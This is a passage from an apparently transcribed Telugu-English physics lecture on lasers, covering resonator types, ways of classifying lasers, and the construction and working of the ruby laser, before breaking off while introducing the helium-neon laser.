ఉంటుంది కనుక ఇది ఎంత దూరమైనా ఈజీగా ట్రావెల్ చేస్తుంది. అదేవిధంగా ఇది స్మాల్ ఏరియాలో హై ఎనర్జీని కూడా డిపాజిట్ చేస్తుంది, ఎందుకంటే దీని ఇంటెన్సిటీ ఎక్కువ. ఫర్ ఎగ్జాంపుల్ ఆర్డినరీ లైట్ సోర్స్ తీసుకుంటే ఈ ఆర్డినరీ లైట్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైట్ వేవ్స్కి యాంగులర్ స్ప్రెడ్ చాలా ఎక్కువగా ఉంటుంది. కాబట్టి ఇవి ఎక్కువ డిస్టెన్సెస్ ట్రావెల్ చేయలేవు ఈ లైట్ వేవ్స్. కానీ ఒక లేజర్ సోర్స్ నుంచి ఎమిట్ అవుతున్న లైట్ వేవ్స్కి యాంగులర్ స్ప్రెడ్ తక్కువగా ఉండడం వల్ల లేజర్ వేవ్స్ అనేవి చాలా ఎక్కువ దూరం ఎటువంటి నష్టం లేకుండా ప్రయాణించగలవు. దీన్నే మనం డైరెక్షనాలిటీ ప్రాపర్టీ కింద చెప్తాము. అయితే ఆర్డినరీ లైట్కి నెక్స్ట్ లేజర్ లైట్కి మధ్యన డిఫరెన్సెస్ మనం ఈ స్లైడ్లో క్లియర్గా మనం అబ్జర్వ్ చేయొచ్చు.
ఆర్డినరీ లైట్లో మల్టీ కలర్స్ ఉంటే ఈ లేజర్ లైట్లో సింగిల్ కలర్డ్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో డిఫరెంట్ డైరెక్షన్స్లో ట్రావెల్ చేస్తుంటే కానీ లేజర్ లైట్కి సింగిల్ డైరెక్షన్ ఉంటుంది. అదేవిధంగా ఆర్డినరీ లైట్లో ఇన్కోహరెంట్ బీమ్ అయితే ఇక్కడికి వచ్చేసరికి కోహరెన్స్. Okay, sir. Ready, sir? So next concept is different types of lasers. What are the different types of lasers which are studying? అయితే తెలుసుకునే ముందు మనకి లేజర్లో ఉన్న డిఫరెంట్ పార్ట్స్ ఏంటి, లేజర్లో ఖచ్చితంగా ఏ లేజర్లో తీసుకున్నా ఈ లేజర్లో 3 పార్ట్స్ ఉంటాయి. ఫస్ట్ వన్ యాక్టివ్ మీడియము, రెండోది ఎగ్జైటేషన్ మెకానిజం, మూడోది రెజొనేటర్. అయితే ఇందులో ఒక్కొక్క దాని గురించి మనం ఇండివిజువల్గా తెలుసుకుందాం. ఇందులో ఈ సెంటర్లో ఉన్నది యాక్టివ్ మీడియం, దాన్ని వాటిని పార్టికల్స్ని పంపింగ్ చేయడానికి ఈ ఎగ్జైటేషన్ మెకానిజం, అలాగే ఈ విధంగా మనకి హై ఇంటెన్సిటీ లేజర్ బీమ్ డెవలప్ అవ్వడానికి ఈ రెజొనేటర్స్ అనేవి వాడడం జరుగుతుంది. సో ఇందులో యాక్టివ్ మీడియం అంటే ఏంటి, యాక్టివ్ మీడియంలో మనకి పార్టికల్స్ ఉంటాయి. ఈ యాక్టివ్ మీడియంలో ఉన్న పార్టికల్స్ మనకి పంపింగ్ ప్రాసెస్లో ఎమిట్ అవుతున్న ఎనర్జీని అబ్జార్బ్ చేసుకొని ఎగ్జైట్ అయ్యి అవి మళ్ళీ స్టిమ్యులేటెడ్ ఎమిషన్స్కి లోన్ కావడం వల్ల మనకి ఫోటాన్స్ అనేవి ఎమిట్ అవ్వడం జరుగుతుంది. అయితే ఈ పార్టికల్స్ అనేవి ఏవైనా కావచ్చు. ఈ పార్టికల్స్ సాలిడ్స్ అవ్వచ్చు, లేదా లిక్విడ్స్ అవ్వచ్చు, లేదా గ్యాసెస్ అవ్వచ్చు, లేదా సెమీ కండక్టర్ మెటీరియల్ అయినా తీసుకోవచ్చు. నెక్స్ట్ వన్ ఆప్టికల్ పంపింగ్ మెకానిజం. ఎగ్జైటేషన్ మెకానిజంలో ఫస్ట్ వన్ అనేది మనకి ఆప్టికల్ పంపింగ్ మెకానిజం, రెండోది ఎలక్ట్రికల్ పంపింగ్ మెకానిజం, మూడోది కెమికల్ పంపింగ్ మెకానిజం, అండ్ ద లాస్ట్ వన్ ఈజ్ థర్మల్ ఆర్ హీట్ పంపింగ్ మెకానిజం. ఈ పంపింగ్ మెకానిజం వల్ల మనకి అబ్జార్ప్షన్ కావాల్సిన ఎనర్జీ అనేది మనకి లభ్యమవుతుంది. అండ్ ద లాస్ట్ వన్ ఈజ్ రెజొనేటర్. ఈ రెజొనేటర్ దేనికి ఉపయోగపడుతుంది, లేజింగ్ యాక్షన్ జరగడానికి ఈ రెజొనేటర్ అనేది మనకు ఉపయోగపడుతుంది. అయితే ఇందులో ఏం జరుగుతుంది, ఈ లేజింగ్ యాక్షన్ వల్ల హై ఎనర్జీ లేజర్ బీమ్ అనేది బయటకు వస్తుంది. అయితే ఈ అరేంజ్మెంట్లో ఏముంటాయి, 2 మిర్రర్స్ ఉంటాయి. ఒకటి పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ మిర్రరు, ఇంకొకటి పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్. సో ఈ పార్షియల్లీ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి మనకి లేజర్ బీమ్ అనేది బయటికి రావడం జరుగుతుంది. లేజర్ బీమ్కి ఒక ఇంటెన్సిటీ రీచ్ అయిన తర్వాత అది ఈ పార్షియల్ రిఫ్లెక్టింగ్ మిర్రర్ నుంచి బయటికి ఎమిట్ అవుతుంది. సో ఇందులోకి వచ్చేసరికి డిఫరెంట్ టైప్స్ ఆఫ్ రెజొనేటర్స్ మనం ఈ స్లైడ్లో చూపిస్తున్నాం. ఇందులో ఫస్ట్ దాంట్లో 2 కూడా ప్లేన్ మిర్రర్స్ ఉన్నాయి. ఆ 2 ప్లేన్ మిర్రర్స్ మధ్య డిస్టెన్స్ సెల్, కాబట్టి ఇది ప్లేన్ ప్యారలల్ రెజొనేటర్. రెండో దాంట్లోకి వచ్చేసరికి ఈ 2 ప్లేన్ మిర్రర్స్ కాకుండా స్పెరికల్ మిర్రర్స్ వాడడం జరిగింది. వీటి యొక్క రేడియస్ ఆఫ్ కర్వేచర్ 2 ఈక్వల్గా ఉంటూ రెండిటి వాల్యూస్ ఆ డిస్టెన్స్ మధ్య ఆ రెండింటి మధ్య ఉన్న డిస్టెన్స్కి హాఫ్ ఉంటుంది, దట్ ఈస్ L/2. సో ఇటువంటి దాన్ని మనం కాన్సెంట్రిక్ రెజొనేటర్ అంటాము. మూడో దానిలోకి వచ్చేసరికి ఒకదాని రేడియస్ ఆఫ్ కర్వేచర్ L అయితే రెండో దానిది కూడా L అవుతుంది. ఇటువంటి దాన్ని మనం కాన్ఫోకల్ రెజొనేటర్ అంటున్నాము. లాస్ట్ వన్ ఒక దాంట్లో ప్లేన్ మిర్రర్ వాడాము, ఇంకో దాంట్లో రేడియస్ ఆఫ్ కర్వేచర్ L కలిగిన ఇంకొక మిర్రర్ వాడాము, దీన్ని హెమిస్పెరికల్ అంటున్నాము. లాస్ట్ వన్కి వచ్చేసరికి ఒకటి రేడియస్ ఆఫ్ కర్వేచర్ L అయితే ఇంకొకటిది రేడియస్ ఆఫ్ కర్వేచర్ L-R1. సో ఈ రెండింటి మధ్య ఉన్న రెజొనేటర్ మనం కాన్వెక్స్ కాన్కేవ్ రెజొనేటర్ అంటున్నాము. సో ఇటువంటి రెజొనేటర్స్ ఏవైనా వాడుతూ మనం లేజర్ని అనేది తయారు చేయొచ్చు. సో ఇప్పుడు లేజర్లో డిఫరెంట్ టైప్స్ ఉన్నాయి. ఈ టైప్స్ని వేరియస్ ఫ్యాక్టర్స్ కింద మనం వాటిని డివైడ్ చేయొచ్చు. సో ఫస్ట్ వన్ ఏంటి, అందులో ఉన్న మీడియం ఏంటి, యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అలాగే అందులో వాడిన ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద థర్డ్ వన్ అనేది వచ్చే అవుట్పుట్ మీద డిపెండ్ అవుతూ కూడా లేజర్స్ని డివైడ్ చేయొచ్చు. అదేవిధంగా అందులో వాడే లెవెల్ సిస్టమ్ మీద కూడా మనం వాడుతూ లేజర్స్ని డివైడ్ చేయొచ్చు. అండ్ ద లాస్ట్ వన్ వేవ్ లెంత్ మీద కూడా డిపెండ్ అవుతూ మనం లేజర్స్ని డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ యాక్టివ్ మీడియం మీద ఆధారపడుతూ లేజర్స్ని ఎన్ని టైప్స్ కింద డివైడ్ చేయొచ్చు. యాక్టివ్ మీడియం మీద కింద ఆధారపడుతూ లేజర్స్ని మనం డిఫరెంట్ టైప్స్ కింద చేయొచ్చు. అందులో ఫస్ట్ వన్ సాలిడ్ స్టేట్ లేజర్, అంటే అందులో వాడే సబ్స్టెన్సెస్ అన్నీ కూడా సాలిడ్ స్టేట్లో ఉంటాయి. ఎగ్జాంపుల్ రూబీ లేజర్. రెండోది లిక్విడ్ లేజర్స్, ఇందులో వాడే సబ్స్టెన్సెస్ లిక్విడ్ మెటీరియల్ కావడం వల్ల లిక్విడ్ లేజర్స్ అంటున్నాము. ఎగ్జాంపుల్ డై లేజర్. థర్డ్ వన్
గ్యాసెస్ సబ్స్టెన్సెస్ వాడితే వచ్చే లేజర్స్ని గ్యాస్ లేజర్స్ అంటున్నాము. ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. అండ్ ద లాస్ట్ వన్ ఈ సెమీ కండక్టర్ లేజర్. ఇందులో మనం సెమీ కండక్టర్ మెటీరియల్స్ వాడతాము. ఎగ్జాంపుల్ గ్యాలియం ఆర్సెనైడ్ లేజర్. అదేవిధంగా ఎగ్జైటేషన్ మెకానిజం మీద ఆధారపడుతూ లేజర్స్ని 4 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ రుబీ లేజర్. రెండోది ఎలక్ట్రికల్ డిశ్చార్జ్ వాడడం వల్ల వచ్చే లేజరు, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. మూడోది కెమికల్ రియాక్షన్స్ వల్ల వచ్చే లేజర్, ఎగ్జాంపుల్ కెమికల్ లేజర్. అండ్ ద లాస్ట్ వన్ థర్మల్ ఎగ్జైటేషన్ మెకానిజం వాడడం వల్ల వచ్చే లేజర్ని మనం థర్మల్ ఎగ్జైటేషన్ మెకానిజం ఎంప్లాయిడ్ లేజర్ అంటున్నాము. దీనికి ఎగ్జాంపుల్ CO2 లేజర్. అదేవిధంగా వచ్చే లేజర్ అవుట్పుట్ మీద డిపెండ్ అవుతూ లేజర్స్ని 2 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అవుట్పుట్ కనుక పల్సెస్ రూపంలో ఉంటే వచ్చే లేజరు పల్సర్ లేజర్, ఎగ్జాంపుల్ రుబీ లేజర్. అదేవిధంగా అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తే దాన్ని కంటిన్యూస్ లేజర్ కింద చెప్తాము, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. నెక్స్ట్ అందులో మనకి లేజింగ్ యాక్షన్ అనేది ఏ లెవెల్స్ మధ్య జరుగుతుంది, అందులో ఎన్ని లెవెల్స్ ఎంప్లాయ్ అయ్యాయి, ఆ ఎనర్జీ లెవెల్స్ మీద డిపెండ్ అవుతూ లేజర్స్ని 3 టైప్స్ కింద డివైడ్ చేయొచ్చు. అందులో 2 లెవెల్స్ కనుక మనం వాడితే దాన్ని 2 లెవెల్ లేజర్ సిస్టమ్ అంటాము. దానికి ఎగ్జాంపుల్ మేజర్, అమోనియా మేజర్. అదేవిధంగా అందులో 3 లెవెల్స్ లేజర్ ఎనర్జీ లెవెల్స్ ఎంప్లాయ్ అయితే దానికి ఎగ్జాంపుల్ 3 రుబీ లేజర్. అదేవిధంగా 4 లెవెల్ లేజర్స్ ఎంప్లాయ్ అయితే దాన్ని మనం 4 లెవెల్ లేజర్ కింద చెప్తాము, ఎగ్జాంపుల్ హీలియం నియాన్ లేజర్. బేసింగ్ అపాన్ వేవ్ లెంత్, బయటకు వచ్చే అవుట్పుట్ యొక్క వేవ్ లెంత్ ఏ వాల్యూ కలిగి ఉంది దాని మీద డిపెండ్ అవుతూ మనం లేజర్స్ని 6 క్లాసెస్ కింద డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ విజిబుల్ రీజియన్లో ఉంటే విజిబుల్ రీజియన్ లేజర్స్ అంటాము, ఎగ్జాంపుల్ రుబీ లేజర్. అది కాకుండా ఐఆర్ రీజియన్లో ఉంటే ఐఆర్ రీజియన్ లేజర్స్ అంటాము, దానికి ఎగ్జాంపుల్ CO2 లేజర్. నెక్స్ట్ యూవీ రీజియన్లో ఉంటే దాన్ని మనం యూవీ రీజియన్ లేజర్స్ అంటాము, ఎగ్జాంపుల్ గ్యాలియం నైట్రైడ్ లేజర్. అదేవిధంగా మైక్రోవేవ్ రీజియన్లో ఉంటే మేజర్స్ అంటాము, దానికి ఎగ్జాంపుల్ అమోనియా మేజర్. అండ్ ఎక్స్రే రీజియన్లో ఉంటే వచ్చే లేజర్స్ మనకి హైలీ అయనైజ్డ్ ప్లాస్మా లేజర్స్. సో ఈ విధంగా మనం డిఫరెంట్ క్లాసెస్ కింద వేవ్ లెంత్ మీద డిపెండ్ అవుతూ డివైడ్ చేయొచ్చు. అందులో ఫస్ట్ వన్ మనకి సిలబస్లో 2 లేజర్స్ ఉన్నాయి, ఒకటి రుబీ లేజరు, ఇంకోటి హీలియం నియాన్ లేజర్. అందులో ఫస్ట్ వన్ మనం తీసుకుంటే రుబీ లేజర్. రుబీ లేజర్ అనేది ఇది సాలిడ్ స్టేట్ లేజర్. రెండోది ఇందులో వచ్చే అవుట్పుట్ పల్సర్ రూపంలో ఉంటుంది కాబట్టి ఇది పల్సర్ లేజర్. ఇందులో వాడే ఎగ్జైటేషన్ మెకానిజము ఆప్టికల్ ఎగ్జైటేషన్ మెకానిజం. అండ్ ఇందులో మనకి 3 లెవెల్స్ లేజర్స్ అనేవి ఉంటాయి కాబట్టి దీన్ని మనం 3 లెవెల్ లేజర్ కింద చెప్పొచ్చు. అదేవిధంగా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది కాబట్టి ఇది విజిబుల్ రీజియన్లో ఉన్న పనిచేసే లేజర్ కింద చెప్పుకోవచ్చు. అయితే రుబీ లేజర్లో ఉండే పార్ట్స్ ఏంటి? ఈ రుబీ లేజర్ని ఫస్ట్ తయారు చేసింది మైమన్ అనే సైంటిస్టు, అది 1960లో. అయితే ఇందులో ఇదే కలర్లో ఉంటుంది, ఇది పింక్ కలర్లో ఉంటుంది. వాట్ ఈస్ ద కెమికల్ నేమ్ ఆఫ్ దిస్ రుబీ లేజర్? దీని కెమికల్ నేము Al2O3 అల్యూమినియం ట్రయాక్సైడ్. కాకపోతే అందులో కొంత క్రోమియం ఆక్సైడ్ కూడా కలిసి ఉంటుంది. ఎంత పర్సెంటేజ్ కలిసి ఉంటుంది? 0.2 నుంచి 0.5% క్రోమియం ఆక్సైడ్ కలిసి ఉంటుంది. ఈ క్రోమియం ఆక్సైడ్ వల్లే ఆ రుబీ లేజర్కి ఆ కలర్. సో క్రోమియం ఆక్సైడ్ యొక్క పర్సెంటేజ్ పెరిగితే దాని కలర్ యొక్క ఇంటెన్సిటీ కూడా పెరుగుతుంది. అయితే ఇందులో యాక్టివ్ మెటీరియల్ ఏంటి? 2 మెటీరియల్స్ ఉన్నాయి, ఒకటి క్రోమియం ఆక్సైడ్ ఉంది, అదేవిధంగా అల్యూమినియం ట్రయాక్సైడ్ ఉంది. కాకపోతే ఈ రెండిట్లో యాక్టివ్ మెటీరియల్ ఏంటంటే మనకి క్రోమియం అయాన్స్ అనేవి యాక్టివ్ మెటీరియల్ ఈ లేజర్లో. మరి అల్యూమినియము అదేవిధంగా ఆక్సిజన్ యాటమ్స్ అనేవి అవి యాక్టివ్గా ఉండవు, ఇన్యాక్టివ్గా ఉంటాయి, అంటే అవి ఇనర్ట్ మెటీరియల్స్. సో ఈ ఫిగర్లో మనం కానీ క్లియర్గా అబ్జర్వ్ చేస్తే దిస్ ఈజ్ ద రుబీ రాడ్ అండ్ దిస్ ఈజ్ ద ఆప్టికల్ పంపింగ్ మెకానిజం, అదేవిధంగా ఇది రెజొనేటర్. సో ఈ రుబీ లేజర్లో వాడే 3 పార్ట్స్ ఇక్కడ మనం క్లియర్గా ఈ ఫిగర్లో మనం అబ్జర్వ్ చేయొచ్చు. సో రుబీ క్రిస్టల్ ఏ రూపంలో తీసుకుంటాం? ఒక సిలిండ్రికల్ రాడ్ రూపంలో తీసుకుంటాం. దాని లెంత్ ఎంత? 4 సెంటీమీటర్స్ లెంత్, అదేవిధంగా డయామీటర్ 0.5 సెంటీమీటర్స్. నెక్స్ట్ ఈ రుబీ రాడ్ యొక్క 2 ఎండ్స్ కూడా మనం పర్ఫెక్ట్గా ప్యారలల్గా ఉండే విధంగా మనం వాటిని అరేంజ్ చేయడం జరుగుతుంది. అదేవిధంగా వాటిని హైలీ పాలిష్డ్ చేస్తాం. హైలీ పాలిష్డ్ చేసిన తర్వాత ఆ 2 ఎండ్స్ని కూడా మనం సిల్వర్ కలర్ అనేది వేయడం జరుగుతుంది. వేయడం వల్ల ఏమవుతుందంటే ఒక సైడ్ ఫుల్లీ రిఫ్లెక్టింగ్ అవుతుంది, అదర్ సైడ్ అనేది పార్షల్ రిఫ్లెక్టింగ్ అయ్యే విధంగా వాటిని మనం సిల్వర్గా ఉండే విధంగా తయారు చేస్తాం. అయితే ఈ రుబీ లేజర్ చుట్టూ హెలికాన్ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది అరేంజ్ చేయడం జరుగుతుంది. ఈ జీనాన్ ఫ్లాష్ ల్యాంప్ అనేది మనకి పంపింగ్ సోర్స్ కింద మనం అబ్జర్వ్ చేయొచ్చు. సో ఈ ఫిగర్లో మనకి క్లియర్గా ఇందులో వాడే పార్ట్స్ అన్ని కనబడుతున్నాయి. ఇది పవర్ సప్లై విచ్ ఈజ్ కనెక్టెడ్ టు ద హెలికల్ జీనాన్ ఫ్లాష్ ల్యాంప్. అదేవిధంగా సెంటర్లో ఉన్న పింక్ కలర్ది రుబీ రాడు.
నెక్స్ట్ ఈ ఎండ్స్ కూడా, రెండు ఎండ్స్ కూడా, ఒకటి పార్షియల్లీ రిఫ్లెక్టింగ్, ఈ చివరి ఎండ్ పర్ఫెక్ట్లీ రిఫ్లెక్టింగ్ ప్లేట్. ఈ మొత్తం డివైస్ అంతా కూడా ఒక స్టీల్, ఒక మెటల్ కంటైనర్లో మనం దీన్ని ప్రొటెక్ట్ చేయడం జరుగుతుంది. నెక్స్ట్ హౌ దిస్ రుబీ లేజర్ ఈజ్ వర్కింగ్. ఎప్పుడైతే జీనాన్ ఫ్లాష్ ల్యాంప్ ఆన్ అయిందో దాని నుంచి వస్తున్న ఎనర్జీని ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకుని ఎగ్జైటెడ్ స్టేట్స్లోకి వెళ్తాయి. సో క్రోమియం అయాన్స్ యొక్క గ్రౌండ్ స్టేట్ ఈవెన్ స్టేట్ అయితే ఈ హెలికల్ జీనాన్ ల్యాంప్ నుంచి వస్తున్న ఎనర్జీని అబ్జార్బ్ చేసుకుని హయ్యర్ ఎనర్జీ స్టేట్స్ అయినటువంటి ఈ స్టేట్స్కి వెళ్ళడం జరుగుతుంది ఎలక్ట్రాన్. సో అక్కడికి వెళ్ళిన ఎలక్ట్రాను తిరిగి కొంత సమయం తర్వాత, అంటే ఆఫ్టర్ ఇట్స్ లైఫ్ టైమ్, దే విల్ బీ రిలీజింగ్ ద ఎనర్జీ అండ్ దే విల్ బీ కమింగ్ టు ద స్టేట్ E2. E2 స్టేట్ అనేది దానికి మెటాస్టేబుల్ స్టేట్, ఎందుకంటే అక్కడ లైఫ్ టైం చాలా ఎక్కువగా ఉంటుంది కాబట్టి అక్కడికి వెళ్ళిన ఎలక్ట్రాన్స్ వాటంతట అవి కిందికి రావు. సో పంపింగ్ ప్రాసెస్ జరుగుతున్నంతసేపు ఈ హయ్యర్ ఎనర్జీ స్టేట్స్కి వెళ్ళిన ఎలక్ట్రాన్స్ ఎనర్జీని లాస్ అవుతూ మళ్ళీ E2 స్టేట్కి వస్తున్నాయి. E2 స్టేట్ నుంచి ఏ ఎలక్ట్రాన్ కూడా కిందికి రాదు. ఈ క్రోమియం అయాన్ అనేది కిందికి రాదు. క్రోమియం అయాన్ కిందికి రాకపోవడం వల్ల ఏమవుతుందంటే ఇక్కడ నెంబర్ అనేది పెరుగుతుంది. నెంబర్ పెరగడం వల్ల పాపులేషన్ అనేది, ఇన్వర్షన్ అనేది అచీవ్ అవ్వడం జరుగుతుంది. సో పాపులేషన్ ఇన్వర్షన్ అచీవ్ అయిన తర్వాత ఇక్కడ పార్టికల్స్ యొక్క నెంబర్ పెరగడం వల్ల ఏదో ఒక పార్టికల్, క్రోమియం పార్టికల్ ఎనర్జీని లాస్ అవుతూ కిందికి రావడానికి మనకి మ్యాక్సిమం ప్రాబబిలిటీ ఉంటుంది. ఆ ప్రాబబిలిటీ వల్ల ఒక స్పాంటేనియస్ ఎమిషన్ జరిగి ఈ మెటాస్టేబుల్ స్టేట్లో ఉన్న ఒక క్రోమియం అయాను ఒక ఫోటాన్ని ఎమిట్ చేస్తూ ఈ లోవర్ ఎనర్జీ స్టేట్కి వస్తుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో ఒక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. ఈ స్పాంటేనియస్ ఎమిషన్లో రిలీజ్ అయిన ఫోటాను మెటాస్టేబుల్ స్టేట్లో ఉన్న మిగతా క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి అక్కడున్న ఈ క్రోమియం అయాన్స్ అన్నింటినీ కూడా గ్రౌండ్ స్టేట్కి స్టిమ్యులేటెడ్ ఎమిషన్ ప్రాసెస్ ద్వారా కిందకు వస్తాయి. సో స్టిమ్యులేటెడ్ ఎమిషన్ ప్రాసెస్ వల్ల మనకి ఇంకొక ఫోటాన్ అనేది ఎమిట్ అవుతుంది. సో ఈ రెండు ఫోటాన్స్ రాడ్ యొక్క లెంత్ వెంబడి ప్రయాణిస్తూ మనకి మిగతా ఫోటాన్స్ని కూడా స్టిమ్యులేట్ చేస్తాయి. ఇందులో ఈ రెడ్ కలర్వి మనకి క్రోమియం అయాన్స్ అయితే, ఎగ్జైటెడ్ స్టేట్లో ఉన్న క్రోమియం అయాన్స్ అయితే, ఈ వైట్ యారోస్ మనకి ఫోటాన్స్. ఈ ఫోటాన్స్ ఏం చేస్తున్నాయంటే ఈ రెడ్ కలర్లో ఉన్న క్రోమియం అయాన్స్తో కొలిజన్స్ జరిపి వాటిని స్టిమ్యులేట్ చేసి వాటిని మళ్ళీ గ్రౌండ్ స్టేట్కి తీసుకురావడం వల్ల ఫోటాన్స్ యొక్క నెంబరు గ్రాడ్యువల్గా పెరుగుతుంది. ఎప్పుడైతే ఫోటాన్స్ యొక్క నెంబర్ గ్రాడ్యువల్గా పెరుగుతుందో ఆటోమేటిక్గా చైన్ రియాక్షన్ జరుగుతుంది. చైన్ రియాక్షన్ జరగడం వల్ల మనకి లోపల లేజర్ ఇంటెన్సిటీ కూడా పెరుగుతుంది. ఈ లేజర్ ఇంటెన్సిటీ ఎప్పుడైతే ఒక పర్టికులర్ వాల్యూని రీచ్ అయిందో అప్పుడు మనకి ఈ పార్షియల్ రిఫ్లెక్టింగ్ సైడ్ నుంచి వేవ్ లెంత్ 694.3 నానోమీటర్స్ కలిగిన వేవ్ లెంత్ రూపంలో లేజర్ లైట్ అనేది బయటకు వస్తుంది. అయితే మనకి ఇక్కడ స్పాంటేనియస్ ఎమిషన్లో ఎమిట్ అయిన ఫస్ట్ ఫోటాను ఈ ప్రాసెస్ అంతటినీ ట్రిగ్గర్ చేస్తుంది. అయితే ఈ రుబీ లేజర్ మనకి ఎక్కడెక్కడ అప్లై అవుతుంది? ఫస్ట్ వన్, ఇట్ ఈస్ యూజ్డ్ ఫర్ ప్రొడ్యూసింగ్ షార్ట్ లేజర్ పల్సెస్. అదేవిధంగా హోలోగ్రాఫిక్ పోర్ట్రైట్స్ని మనం తయారు చేయడంలో ఉపయోగపడుతుంది. లాస్ట్ వన్, హోలోగ్రామ్స్ ఆఫ్ లార్జ్ ఆబ్జెక్ట్స్ని తయారు చేయడంలో ఉపయోగపడుతుంది. అదేవిధంగా మన టాటూస్ కానీ హెయిర్ రిమూవల్ ప్రాసెస్లో కానీ ఈ రుబీ లేజర్స్ అప్లికేషన్స్ అనేవి చాలా విరివిగా ఉన్నాయి. అయితే రుబీ లేజర్స్లో ఉన్న డ్రాబ్యాక్ ఏంటి? దీనిలో ఉన్న మెయిన్ డ్రాబ్యాక్ ఏంటంటే ఇది పల్స్డ్ లేజర్, ఇది కంటిన్యూస్ లేజర్ కాదు. నెక్స్ట్ ఇందులో వాడేది హై పంపింగ్ పవర్ కావాలి. నెక్స్ట్ అదేవిధంగా దీనికి ఎఫిషియన్సీ కూడా చాలా తక్కువ. నెక్స్ట్ ఇందులో రుబీ రాడ్ అనేది క్రిస్టలైన్ రూపంలో ఉంటుంది కాబట్టి క్రిస్టలైన్ ఇంపర్ఫెక్షన్స్ కూడా ఉండడం వల్ల కొన్ని డిఫెక్ట్స్ అనేవి ఉంటున్నాయి. లాస్ట్ వన్, ఇందులో హై ఎనర్జీ మనకి జీనాన్ ఫ్లాష్ ల్యాంప్ ఇచ్చినప్పటికి కూడా ఈ క్రోమియం అయాన్స్ అబ్జార్బ్ చేసుకున్న ఎనర్జీ చాలా తక్కువగా ఉంటుంది. అంటే మిగతా ఎనర్జీ కూడా మొత్తం ఆపరేటస్ అంతటినీ హీట్ చేయడానికి ఉపయోగపడుతుంది. కనుక ఖచ్చితంగా ఈ ఆపరేటస్లో మనం కూలింగ్ అరేంజ్మెంట్ అనేది వాడి తీరాలి. సో ఈ డ్రాబ్యాక్స్ అన్నీ మనకి కొంతవరకు హీలియం నియాన్ లేజర్లో ఎలిమినేట్ అవుతాయి. సో హీలియం నియాన్ లేజర్ ఇందులో వాడేది గ్యాస్ సబ్స్టెన్సెస్ కనుక ఇది గ్యాస్ లేజరు. నెక్స్ట్ ఇందులో అవుట్పుట్ కంటిన్యూస్ వేవ్ రూపంలో వస్తుంది కాబట్టి ఇది కంటిన్యూస్ లేజరు. నెక్స్ట్ వన్, ఇందులో ఎలక్ట్రికల్ డిశ్చార్జ్ పంపింగ్ మెకానిజం వాడడం జరుగుతుంది. నెక్స్ట్ ఇందులో 4 లెవెల్స్ మధ్య మనకి ఎనర్జీ ట్రాన్సిషన్స్ అనేవి ఉంటాయి కాబట్టి మనకి ఇది 4 లెవెల్ లేజరు. అండ్ ద లాస్ట్ వన్, ఇందులో కూడా అవుట్పుట్ విజిబుల్ రీజియన్లో ఉంటుంది. సో ఇక్కడ
ఈ హీలియం నియాన్ లేజర్ని ఫస్ట్ తయారు చేసింది జవాన్, బెన్నెట్ అండ్ డి హీరియట్. వీళ్ళు 1961లో దీన్ని రూపొందించారు. ఇందులో ఏముంటుంది, ఇందులో ఒక క్వార్ట్జ్డ్ ట్యూబ్ ఉంటుంది. ఈ క్వార్ట్జ్డ్ ట్యూబ్ యొక్క లెంత్ 80 సెంటీమీటర్స్ ఉంటే డయామీటర్ 1.5 సెంటీమీటర్స్ ఉంటుంది. ఇటువంటి క్వార్ట్జ్ ట్యూబ్లో మనకి 2 గ్యాసెస్ అనేవి మిక్స్చర్ రూపంలో ఉంటాయి. ఒకటి హీలియము అండ్ ద అదర్ వన్ ఈజ్ నియాన్. ఈ నియాన్ హీలియం యొక్క రేషియో ఎంత ఉంటుంది, 1:10 రూపంలో ఉంటుంది. అదేవిధంగా ఈ 2 గ్యాసెస్ కూడా 2 డిఫరెంట్ ప్రెషర్స్ వద్ద ఉంటాయి. అందులో హీలియం ప్రెషరు 1 mm ఆఫ్ మెర్క్యూరీ అయితే నియాన్ ప్రెషరు 0.1 mm ఆఫ్ మెర్క్యూరీ. నెక్స్ట్ ఈ క్వార్ట్జ్ ట్యూబ్కి ఒక ఎండ్ పర్ఫెక్ట్ రిఫ్లెక్టర్ ఉంటుంది, ఇంకొక ఎండ్ పార్షియల్ రిఫ్లెక్టర్ ఉంటుంది. సో దిస్ ఈజ్ వన్ రిఫ్లెక్టర్ అండ్ ద అదర్ వన్ ఈజ్ రిఫ్లెక్టర్ ఈజ్ దిస్. ఇందులో రెడ్ కలర్లో మెజారిటీ ఛార్జ్ క్యారియర్స్ ఉన్నవి మనకి హీలియం ఆటమ్స్ అయితే గ్రీన్ కలర్లో ఉన్నవి నియాన్ ఆటమ్స్. ఇది క్వార్ట్జ్ ట్యూబ్. ఇందులో లెంత్ 80 సెంటీమీటర్స్, డయామీటర్ 1.5 సెంటీమీటర్స్. నెక్స్ట్ ఎగ్జైటేషన్ అనేది ఇందులో జరిగే ప్రాసెస్ ఏంటంటే ఎలక్ట్రికల్ డిశ్చార్జ్. ఈ ఎలక్ట్రికల్ డిశ్చార్జ్ అనేది హై ఫ్రీక్వెన్సీ జనరేటర్ నుంచి వస్తున్న ఎలక్ట్రికల్ సిగ్నల్స్ రూపంలో ఎలక్ట్రికల్ డిశ్చార్జ్ జరిగి ఈ హీలియం ఆటమ్స్ కానీ నియాన్ ఆటమ్స్ కానీ 